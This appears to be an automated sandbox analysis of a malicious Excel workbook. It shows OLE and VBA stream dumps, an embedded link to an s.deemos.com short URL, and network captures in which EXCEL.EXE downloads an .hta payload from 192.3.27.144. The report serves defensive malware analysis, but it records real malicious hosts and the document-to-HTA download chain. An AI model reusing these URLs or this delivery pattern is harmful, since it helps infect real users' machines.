                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                General
                Stream Path:MBD01010D3D/MBD00B0D551/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.219515110876372
                Base64 Encoded:False
                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD01010D3D/MBD00B0D551/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:14238
                Entropy:7.303580280986802
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD01010D3D/Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:105412
                Entropy:7.421944967303672
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                General
                Stream Path:MBD01010D3E/\x1Ole
                CLSID:
                File Type:data
                Stream Size:814
                Entropy:5.386624507348723
                Base64 Encoded:False
                Data ASCII:. . . . K . . 0 M z o . . . . . . . . . . . . P . . . y . . . K . L . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . f . m . G . Z . a . V . n . S . ? . & . b . u . s . h . = . w . a . t . c . h . f . u . l . & . g . r . a . n . d . m . o . m . = . a . d . j . o . i . n . i . n . g . & . h . a . c . k . w . o . r . k . . . A p M { T f . . ] Q . r * . d $ k I # . . . . + U . . | Z E . . . E E . f , U ( I = X G . X K X W N { c x z . p ^ . C . 7 e | K . ' ' o . I N .
                Data Raw:01 00 00 02 4b 0b 07 30 4d c4 7a 6f 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 4c 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 66 00 6d 00 47 00 5a 00 61 00 56 00 6e 00 53 00 3f 00 26 00 62 00 75 00 73 00 68 00 3d 00 77 00 61 00 74 00 63 00
                General
                Stream Path:Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:93622
                Entropy:7.991014695555721
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . D ( < 8 & x 3 & R } 2 q [ . . . . . & R . g e s $ . . . . . . . . . . \\ . p . ? 0 < v O . Q . . 0 Q ' . + . = ? 2 I K K ` i m . T . . K o . . G U N > k < X . B < . h . . S 4 _ $ K ` r . r B . . . a . . . 8 . . . = . . . v R w . . . b o o ' . . . . . . . . . . . . . . . j " . . . a . . . . B = . . . q . . f . . 2 @ . . . 5 c . . . " . . . . . . . . W . . . . . . . 1 . . . . S , c 1 k 2 r t . B c . . $ . 1 . . . V G z : T R 3 H D 2 1 + 2 L p . . h ( . b
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 44 28 3c 38 26 a9 ca cf ec 78 33 86 26 b6 a2 b6 52 7d 32 cd 71 5b 1f dc 20 a6 2e 85 84 04 e7 8a af 06 26 52 e6 cd 98 67 9c 65 9d ec 73 97 24 ac e1 00 02 00 b0 04 c1 00 02 00 85 99 e2 00 00 00 5c 00 70 00 3f a0 30 3c 76 4f 06 51 1a bf 03 af ec 30 a5 ab 51 ca 27 1b 88 f4 2b 8d ab e4 c9 86 8b 9c
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:523
                Entropy:5.170198522769169
                Base64 Encoded:True
                Data ASCII:I D = " { 0 E A 8 D A 3 C - 6 9 9 A - 4 2 3 B - 9 3 C C - D 2 D 2 3 1 C 2 1 0 F 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 2 D 0 2 2 3 8 1 E 3 C 1 E 3 C 1
                Data Raw:49 44 3d 22 7b 30 45 41 38 44 41 33 43 2d 36 39 39 41 2d 34 32 33 42 2d 39 33 43 43 2d 44 32 44 32 33 31 43 32 31 30 46 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:104
                Entropy:3.0488640812019017
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                CLSID:
                File Type:data
                Stream Size:2644
                Entropy:3.998076288976716
                Base64 Encoded:False
                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                CLSID:
                File Type:data
                Stream Size:553
                Entropy:6.374192764178085
                Base64 Encoded:True
                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 a3 ef 90 69 0d 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                TimestampSource PortDest PortSource IPDest IP
                Jan 8, 2025 09:49:56.371922016 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:49:56.371975899 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:49:56.372051001 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:49:56.377749920 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:49:56.377773046 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.311870098 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.311956882 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.313091040 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.313107967 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.314332008 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.314399958 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.318305016 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.318397999 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.318449974 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.318460941 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.318500042 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.328989983 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.375330925 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.879349947 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.879410982 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.879434109 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.879450083 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.879479885 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.879492044 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.883867025 CET53681443192.168.2.2414.103.79.10
                Jan 8, 2025 09:50:00.883881092 CET4435368114.103.79.10192.168.2.24
                Jan 8, 2025 09:50:00.885468006 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:00.890250921 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:00.890320063 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:00.890556097 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:00.895292044 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365449905 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365473032 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365482092 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365488052 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365498066 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365514040 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365530968 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365542889 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365554094 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365570068 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.365573883 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.365607023 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.365641117 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.370456934 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.370471001 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.370481968 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.370493889 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.370516062 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.370557070 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.380784035 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.382285118 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.452461958 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.452481031 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.452493906 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.452519894 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.452549934 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.452573061 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.452598095 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.452610970 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.452615023 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.452642918 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.452649117 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.452656031 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.452691078 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.453457117 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.453469992 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.453481913 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.453525066 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.453547001 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.453560114 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.453562975 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.453593016 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.453614950 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.454359055 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.454370022 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.454381943 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.454386950 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.454397917 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.454437017 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.454464912 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.455140114 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.455151081 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.455168009 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.455179930 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.455192089 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.455194950 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.455229044 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.455240965 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.455903053 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.455950975 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.514678001 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.514692068 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.514744043 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.539232969 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.539254904 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.539307117 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.539334059 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.539345980 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.539361000 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.539377928 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.539397955 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.539410114 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.539419889 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.539433002 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.539448977 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.539470911 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.539482117 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.540314913 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540329933 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540342093 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540380955 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.540426016 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.540673018 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540684938 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540692091 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540733099 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540745020 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540755987 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540759087 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.540767908 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.540802002 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.540818930 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.541659117 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.541671038 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.541683912 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.541722059 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.541745901 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.541758060 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.541768074 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.541769028 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.541783094 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.541816950 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.541850090 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.542645931 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.542659044 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.542679071 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.542697906 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.542702913 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.542711020 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.542721033 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.542733908 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.542733908 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.542768955 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.542790890 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.543705940 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.543718100 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.543735027 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.543745041 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.543756962 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.543768883 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.543771982 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.543781996 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.543822050 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.544657946 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.544668913 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.544680119 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.544692039 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.544729948 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.544764996 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.582748890 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.582762003 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.582772970 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.582828045 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.582881927 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.624253035 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.624320984 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.626192093 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626204014 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626223087 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626235962 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626249075 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.626255035 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626266956 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626281977 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626292944 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626292944 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.626332045 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.626332045 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.626516104 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626527071 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626538992 CET8053682192.3.27.144192.168.2.24
                Jan 8, 2025 09:50:01.626569033 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.626599073 CET5368280192.168.2.24192.3.27.144
                Jan 8, 2025 09:50:01.626682043 CET5368280192.168.2.24192.3.27.144
                TimestampSource PortDest PortSource IPDest IP
                Jan 8, 2025 09:49:55.932955980 CET5737753192.168.2.241.1.1.1
                Jan 8, 2025 09:49:56.370961905 CET53573771.1.1.1192.168.2.24
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jan 8, 2025 09:49:55.932955980 CET192.168.2.241.1.1.10xe6bStandard query (0)s.deemos.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jan 8, 2025 09:48:55.566906929 CET1.1.1.1192.168.2.240x9ad8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                Jan 8, 2025 09:48:55.566906929 CET1.1.1.1192.168.2.240x9ad8No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                Jan 8, 2025 09:49:56.370961905 CET1.1.1.1192.168.2.240xe6bNo error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                • s.deemos.com
                • 192.3.27.144
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.2453682192.3.27.144807048C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Jan 8, 2025 09:50:00.890556097 CET270OUTGET /250/gse/begoodforeverythinggreatthingsformebetterforgood.hta HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Connection: Keep-Alive
                Host: 192.3.27.144
                Jan 8, 2025 09:50:01.365449905 CET1236INHTTP/1.1 200 OK
                Date: Wed, 08 Jan 2025 08:50:01 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                Last-Modified: Tue, 07 Jan 2025 16:22:17 GMT
                ETag: "1b0ad-62b2026074baf"
                Accept-Ranges: bytes
                Content-Length: 110765
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/hta
